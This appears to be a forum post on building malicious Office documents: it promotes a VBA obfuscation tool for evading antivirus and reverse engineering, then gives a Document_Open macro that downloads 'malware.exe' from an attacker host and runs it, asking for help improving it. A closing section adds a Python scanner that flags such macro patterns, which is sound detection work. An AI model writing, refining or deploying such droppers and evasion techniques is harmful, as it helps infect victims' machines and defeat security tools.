A common vector for the delivery of malware is a Word/Excel macro. Obfuscating/encrypting the source code of your malware is obviously very important, and not only for opsec purposes: the longer it takes researchers/AV companies to reverse engineer your malware, the longer it will stay effective. If your delivery mechanism is a downloader embedded in an Office document, adding obfuscation and encryption not only protects against reverse engineering but also aids in evading AV heuristics. To that end I've found a Python implementation that not only obfuscates your VBA code but automatically generates an Office document based on a template and inserts your downloader within it. What's more, it's fully customizable. Its features are as follows:
- Encrypt all strings present in your VBA code
- Encrypt data from your python Script in VBA code (domain names or paths for example)
- Randomize each function's (or variable's) name
- Choose the encryption method, and how and where the encryption keys are stored
- Generate as many unique MS Office documents as you want using a file name list and a document template
- Enable the auto-destruction of the encryption keys once the VBA has been triggered once
As I understand it, the way it works is as follows. The Python script reads in a VB script and looks for certain tags within the code. Based on the tags it performs an operation such as randomizing a variable or function name, for instance:
Function [rdm::10]Test() '=> Test() will become randomized with a 10 characters string
[rdm::4]String_1 = "Test" '=> String_1 will become randomized with a 4 characters string
Depending on the values you set in config.py, a type of encryption is selected, among a number of other settings. Here's a screenshot of the script in action.
Pretty cool if you ask me. Here's a link to the relevant repo on GitHub:
https://github.com/Pepitoh/VBad
Now, doing some research into malware deployed in this manner and relevant code examples written in VBScript, I kind of tried to jury-rig the following based on code found here.
https://github.com/CloudStrief/xcode...doc/skript.txt
Option Explicit
Public CN As String
Public APD As String
Public UN As String
Public HOSTNAME As String
Public DROPPER_EXE As String
Public PAYLOADS_FOLDER As String
Public PAYLOAD_FILE As String
Function InitMe()
    DROPPER_EXE = "malware.exe"
    HOSTNAME = "http://www.evilhost.com/code"
    PAYLOADS_FOLDER = HOSTNAME & "/payloads/"
    CN = Environ("COMPUTERNAME")
    APD = Environ("TMP")
    UN = Environ("USERNAME")
End Function
Sub Document_Open()
    InitMe
    Dim val As String
    Dim FN As String
    PayLoad (APD + DROPPER_EXE)
    Dim oShell
    Set oShell = CreateObject("WScript.Shell")
    oShell.Run APD + DROPPER_EXE
    FN = APD
    On Error GoTo 0
End Sub
Private Sub writeBytes(file, bytes)
    Dim binaryStream
    Set binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = 1
    binaryStream.Open
    binaryStream.Write bytes
    binaryStream.SaveToFile file, 2
End Sub
Function getPayload(val As String, FN As String)
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", PAYLOADS_FOLDER & DROPPER_EXE
    WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    WinHttpReq.SetRequestHeader "Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Language", "en-us,en;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
    WinHttpReq.send
    writeBytes FN, WinHttpReq.ResponseBody
End Function
This is probably full of errors since I don't have a clue about Visual Basic/VBA/VBS, so I was wondering if you could help me improve this particular block of code. Interestingly enough, the original repo contains all you need, including the malware itself written in Python and everything you need server-side to deploy this. If you're interested, here's a link to the complete project.
https://github.com/CloudStrief/xcode
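From the detection side, as an added example that is not part of the original post or of either project linked above: a small Python triage script that flags the auto-open / download / write-to-disk / execute pattern of the macro in the post, the kind of keyword scan that string encryption and name randomization exist to defeat, so it also counts the decoding primitives (Chr, Xor, StrReverse) an obfuscated macro tends to lean on. The indicator lists and the sample macro are constructed for this example and are not an exhaustive signature set.

```python
import re

# Indicator groups for triaging VBA macro source (constructed for this example,
# not an exhaustive signature set). The downloader pattern is a hit in each of
# the four groups: auto-exec entry point, network fetch, file write, execution.
INDICATORS = {
    "autoexec": [r"\bDocument_Open\b", r"\bAuto_?Open\b", r"\bWorkbook_Open\b"],
    "network": [r"Microsoft\.XMLHTTP", r"MSXML2\.(?:Server)?XMLHTTP", r"WinHttp\.WinHttpRequest"],
    "write": [r"ADODB\.Stream", r"\.SaveToFile\b"],
    "execute": [r"WScript\.Shell", r"\bShell\s*\(", r"\.Run\b"],
    "recon": [r"\bEnviron\s*\("],
    # Primitives that string decryption routines tend to rely on; a macro full
    # of these and free of plain CreateObject strings deserves a closer look.
    "decode": [r"\bChr[WB$]?\s*\(", r"\bXor\b", r"\bStrReverse\b"],
}

def scan_vba(source: str) -> dict:
    """Return {group: sorted unique matches} for every group that hit."""
    hits = {}
    for group, patterns in INDICATORS.items():
        found = {m.group(0) for pat in patterns
                 for m in re.finditer(pat, source, flags=re.IGNORECASE)}
        if found:
            hits[group] = sorted(found)
    return hits

def classify(hits: dict) -> str:
    """Coarse verdict from the indicator groups present."""
    if {"autoexec", "network", "write", "execute"} <= hits.keys():
        return "downloader"
    if "autoexec" in hits and len(hits) >= 2:
        return "suspicious"
    return "no-downloader-pattern"

# Constructed sample: the skeleton of the macro in the post, reduced to the
# calls a scanner sees. Obfuscated samples hide these behind runtime decoding.
SAMPLE_MACRO = """
Sub Document_Open()
    Set req = CreateObject("Microsoft.XMLHTTP")
    Set strm = CreateObject("ADODB.Stream")
    strm.SaveToFile FN, 2
    Set oShell = CreateObject("WScript.Shell")
    oShell.Run Environ("TMP") & DROPPER_EXE
End Sub
"""

if __name__ == "__main__":
    h = scan_vba(SAMPLE_MACRO)
    for group, matches in h.items():
        print(f"{group:9s} {', '.join(matches)}")
    print("verdict:", classify(h))
```

The same scan run on output of an obfuscator like the one described will usually lose the network, write and execute groups while gaining the decode group, which is itself a useful signal.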